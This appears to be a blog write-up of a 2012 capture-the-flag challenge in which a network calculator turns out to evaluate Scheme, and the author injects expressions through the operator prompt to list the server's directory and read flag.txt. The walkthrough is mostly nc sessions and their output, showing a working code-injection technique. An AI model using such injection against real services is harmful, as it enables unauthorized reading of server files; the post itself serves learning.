«

»

Nov
19

PoliCTF 2012 pwn/bin 200

Play with this amazing calculator: calc.challenges.polictf.it:4000

Summary: Scheme eval

$ nc -n 131.175.17.33 4000
Write the first number:1e12345
Write the operator:+
Write the second number:1
+inf.0

Googling +inf.0 quickly gives you that it’s Scheme. Try prefix form:

$ nc -n 131.175.17.33 4000
Write the first number:
Write the operator:+ 3 5 7
Write the second number:
15

Ok! Now let’s read the file:

$ nc -n 131.175.17.33 4000
nc -n 131.175.17.33 4000
Write the first number:
Write the operator:car (directory-list)
Write the second number:
flag.txt
 
$ nc -n 131.175.17.33 4000
Write the first number:
Write the operator:read-line (open-input-file "flag.txt")
Write the second number:
cb1228e2387cc12ad30fd4243fc23a0

The flag: cb1228e2387cc12ad30fd4243fc23a0

Leave a Reply

Your email address will not be published.

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>